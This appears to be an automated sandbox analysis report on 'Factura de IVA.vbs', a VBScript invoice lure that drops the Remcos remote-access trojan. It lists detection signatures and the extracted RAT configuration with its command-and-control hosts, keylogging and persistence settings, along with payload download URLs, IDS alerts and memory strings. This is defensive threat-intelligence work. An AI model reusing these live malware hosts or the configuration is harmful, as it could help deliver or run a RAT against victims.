Windows Analysis Report
Factura de IVA.vbs

Overview

General Information

Sample name: Factura de IVA.vbs
Analysis ID: 1648971
MD5: 04777da0fa509a73837922fd8a5d5903
SHA1: cf97e0f94d18ad4aac811f79d80813c338548a85
SHA256: d083f48c6a565f994bb04351ca40d8d59147fb1a512435dd4d91a80c86a63b0a
Tags: vbsuser-lowmal3
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://ia800705.us.archive.org/14/items/new_image_20250324/new_image.jpg Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000010.00000002.2669984293.000000000121B000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["swrem.justswents.com:23101:1", "mold.justswgroup.com:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "RmcuIYHgvtuvuyVTvuyviiywVKYV*ytvUIYVIAYVIYVIY-UEDFV8", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Multi AV Scanner detection for submitted file
Source: Factura de IVA.vbs ReversingLabs: Detection: 13%
Yara detected Remcos RAT
Source: Yara match File source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.269403c7440.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.2669984293.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2669984293.000000000121B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2672109815.0000000002E5F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3088, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 99.6%
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 16_2_00433B64
Source: powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_9700ef4f-1

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.269403c7440.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3088, type: MEMORYSTR

Privilege Escalation
barindex
Contains functionality to bypass UAC (CMSTPLUA)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00406ABC _wcslen,CoGetObject, 16_2_00406ABC
Source: unknown HTTPS traffic detected: 207.241.230.75:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbase source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: `2dnlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.
Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinst
Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 16_2_004090DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 16_2_0040B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 16_2_0041C7E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 16_2_0040B8BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0044E989 FindFirstFileExA, 16_2_0044E989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 16_2_00408CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW, 16_2_00419CEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 16_2_00407EDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00406F13 FindFirstFileW,FindNextFileW, 16_2_00406F13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 16_2_00407357

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49737 -> 45.154.98.113:23101
Source: Network traffic Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 45.154.98.113:80 -> 192.168.2.5:49736
Source: Network traffic Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 45.154.98.113:80 -> 192.168.2.5:49736
Source: Network traffic Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 45.154.98.113:80 -> 192.168.2.5:49736
Source: Network traffic Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 45.154.98.113:80 -> 192.168.2.5:49736
Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 207.241.230.75:443 -> 192.168.2.5:49732
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: swrem.justswents.com
Source: Malware configuration extractor URLs: mold.justswgroup.com
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49737 -> 45.154.98.113:23101
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /14/items/new_image_20250324/new_image.jpg HTTP/1.1Host: ia800705.us.archive.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kind/mate.txt HTTP/1.1Host: dea.remwavesw.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
Source: Joe Sandbox View ASN Name: LRH-ASNL LRH-ASNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49725 -> 45.154.98.113:80
